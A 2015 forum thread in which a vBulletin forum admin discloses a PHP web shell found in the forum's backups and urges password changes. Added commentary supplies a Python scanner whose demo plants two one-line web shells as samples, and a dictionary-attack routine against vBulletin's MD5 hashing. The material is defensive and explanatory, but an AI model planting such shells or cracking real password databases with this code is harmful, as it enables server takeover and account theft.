Forum Hack ?!? (Nov 2015)

GHDpro

Administrator
Staff member
I guess I should also make this public (mods have known about it for a while).

Some time ago I switched anti-virus software on my PC and when it did a full scan it found malware -- in the backups of the forum.

Somehow a PHP shell was injected into the forum (in a location that was writable by the webserver software) in September 2013. Yes, that long ago.

However, I have no clue who put it there or why. While I do have data backups from that time (confirming the file had indeed been there that long), the backups don't include access logs, as they consume a lot of disk space.

It's a bit weird that somehow with this much access to the server (not exactly root, but with a PHP shell you can do a lot of damage), they didn't do anything that was actually noticed: the forum hasn't been pwned or hosed or anything.

I suspect the perpetrator may have tried to hack the forum for a specific purpose and didn't find what he was looking for. But that's all speculation.


So what does this all mean?

Well technically this means anyone who knew about the PHP shell could have had full access to all files on the server and full database access. That last bit means theoretically somebody could have had access to all user information including usernames, email addresses, password hashes and salts.

It should be noted that on vBulletin forums (v3 & v4 at least) the kind of hashing done on passwords is ridiculously weak: just MD5 with a salt. Anyone who really wants to can and will be able to crack just about any password encrypted this way.

Now the problem is that we don't know whether the user database was compromised or not, or what really was done at all. So for this reason we have not reset everyone's passwords.

But it is highly recommended that you change your password anyway.

In addition if you used your forum password and username/email address combination anywhere else you should also change it on those other sites.

Ideally you should of course never ever reuse passwords on any site. Use a password manager like Dashlane, 1Password, KeePass or LastPass.


Does this have anything to do with the recent vBulletin.com hack?

No. This problem was discovered earlier than that. At this point it looks like the problems surrounding that hack involve vBulletin v5 which we fortunately don't use. If it also affects v4 I'll patch the forum as soon as possible, but at this time no such patches have been made available.


What has been done to prevent this from happening again?

The forum server has been completely wiped and reloaded. Also, the webserver configuration has been tweaked slightly so that PHP is not executed in writable folders (so the same trick won't work again). Lastly, vBulletin was updated to the latest version (v4.2.3; we were still using a slightly older version before).
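The admin above found the shell only because a desktop AV happened to scan a backup. A direct check for the condition he describes (a PHP file sitting in a directory the webserver can write to) is easy to script and worth running against a docroot and against old backups. The example below is added here and is not code from the post or from vBulletin; the directory tree it scans is constructed inside a temp folder, the extension list and the indicator regex are assumptions about a typical PHP setup, and `web_uid` is a hypothetical parameter for the uid your httpd runs as.

```python
import hashlib
import os
import re
import stat
import tempfile
from pathlib import Path

# Extensions a PHP handler is commonly mapped to (assumption: typical
# Apache/nginx setup; match this to your server's actual handler list).
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

# Building blocks of PHP shells that almost never belong in an uploaded file.
SHELL_INDICATORS = re.compile(
    rb"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\("
    rb"|\bbase64_decode\s*\("
    rb"|\$_(?:GET|POST|REQUEST|COOKIE)\[[^\]]*\]\s*\(",  # $_POST['f']($_POST['a'])
    re.IGNORECASE,
)


def looks_like_php(path: Path) -> bool:
    """PHP by extension, or by content: a 'thumb.jpg' that starts with '<?php'
    is still a shell if the server can be persuaded to run it."""
    if path.suffix.lower() in PHP_EXTENSIONS:
        return True
    with path.open("rb") as fh:
        return fh.read(256).lstrip().startswith(b"<?")


def writable_by_webserver(directory: Path, web_uid=None) -> bool:
    """True if the webserver could drop a file here: the directory is owned by
    the webserver uid (when given), or is group- or world-writable."""
    st = directory.stat()
    if web_uid is not None and st.st_uid == web_uid:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def scan(docroot, web_uid=None):
    """Report every PHP file that sits in a webserver-writable directory under
    `docroot`, with a hash (to compare against backups from other dates), the
    mtime (a rough planting date; an attacker can forge it) and any shell
    indicators found in the content."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        d = Path(dirpath)
        if not writable_by_webserver(d, web_uid):
            continue
        for name in files:
            p = d / name
            if not p.is_file() or not looks_like_php(p):
                continue
            data = p.read_bytes()
            hits = sorted({m.group(0).decode("ascii", "replace")
                           for m in SHELL_INDICATORS.finditer(data)})
            findings.append({
                "path": str(p.relative_to(docroot)),
                "sha256": hashlib.sha256(data).hexdigest(),
                "mtime": int(p.stat().st_mtime),
                "indicators": hits,
            })
    return sorted(findings, key=lambda f: f["path"])


def demo():
    """Constructed docroot (not real forum data): a legitimate index.php in a
    non-writable directory, plus two planted files in a world-writable uploads/.
    Returns the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:   # created with mode 0700
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'forum home'; ?>\n")
        up = root / "uploads"
        up.mkdir()
        (up / "avatar.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
        (up / ".cache.php").write_bytes(
            b'<?php @eval(base64_decode($_POST["c"])); ?>')
        (up / "thumb.jpg").write_bytes(b"<?php system($_GET['cmd']); ?>")
        up.chmod(0o777)   # the usual "just make uploads work" mistake
        return scan(root)


if __name__ == "__main__":
    for f in demo():
        print(f["path"], f["sha256"][:12], f["indicators"])
```

Run it as `scan("/var/www/forum", web_uid=<uid of www-data>)`; anything it returns is either a shell or a PHP file that should not be in a writable directory in the first place. Files with no indicators still matter: the real fix is the one the admin applied, which in Apache with mod_php looks like `php_admin_flag engine off` inside a `<Directory>` block for the upload path, and in nginx like a `location` rule that returns 403 for `*.php` under `/uploads/` (both are illustrations of that setting, not configuration taken from this forum).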
 
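To make the point about vBulletin 3/4 password hashing concrete: the stored value is md5(md5(password) + salt), and the salt sits in the clear next to the hash, so a stolen database gives an attacker everything needed to guess at full MD5 speed. The example below is added here and is not code from the post or from vBulletin; the user record, salt and wordlist are constructed for the demonstration, and the mangling rules are a toy version of what hashcat or John apply.

```python
import hashlib
import time


def vb_hash(password: str, salt: str) -> str:
    """vBulletin 3/4 stored form: md5(md5(password) + salt).
    Two MD5 calls per guess, so the salt adds no cost to the attacker; it only
    stops one precomputed table being reused across users."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def candidates(base_words):
    """Toy mangling ruleset: word, Capitalised, and a few common suffixes.
    Real crackers apply thousands of rules per word."""
    for w in base_words:
        for form in (w, w.capitalize()):
            yield form
            for suffix in ("!", "1", "123", "2013", "2015"):
                yield form + suffix


def crack(stored_hash: str, salt: str, base_words):
    """Dictionary attack on a single user's (hash, salt) pair.
    Returns (password, number_of_guesses) or (None, number_of_guesses)."""
    n = 0
    for n, guess in enumerate(candidates(base_words), 1):
        if vb_hash(guess, salt) == stored_hash:
            return guess, n
    return None, n


def guesses_per_second(seconds: float = 0.2) -> int:
    """Pure-Python rate on one core; a GPU running hashcat's vBulletin mode is
    orders of magnitude faster than this."""
    salt, n, deadline = "x7Q", 0, time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        vb_hash(str(n), salt)
        n += 1
    return int(n / seconds)


def demo():
    """Constructed user record, not taken from any real database."""
    salt = "x7Q"                       # vB3 used 3-char salts, vB4 30-char
    stored = vb_hash("summer2013", salt)
    words = ["password", "letmein", "summer", "forum", "dragon"]
    return crack(stored, salt, words)


if __name__ == "__main__":
    password, guesses = demo()
    print(f"recovered {password!r} after {guesses} guesses")
    print(f"~{guesses_per_second():,} guesses/s in plain Python")
```

The database export gives the attacker `hash:salt` per user, which is exactly the input format hashcat expects for its vBulletin modes (2611 for versions before 3.8.5, 2711 for later ones). The salt forces one run per user rather than one run for the whole table, but each run is as cheap as unsalted MD5, which is why the advice in the post is to change the password everywhere it was reused rather than to rely on the hash.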

Touko White

I'm cute, aren't I?
This is exactly why I don't like vBulletin or XenForo much at all. :p

I recommend IP.Board if you need paid software, even though it is a lot of money to purchase (£100 for a licence, I think), or use something open-source like MyBB, which doesn't cost anything to use and is much lighter. :)

Normally I'd say 'AcmlmBoard XD' but it doesn't have loads of features and isn't supported anymore, however no security issues have been found with it.

I'll have to come up with another cryptic password now, irritating.
 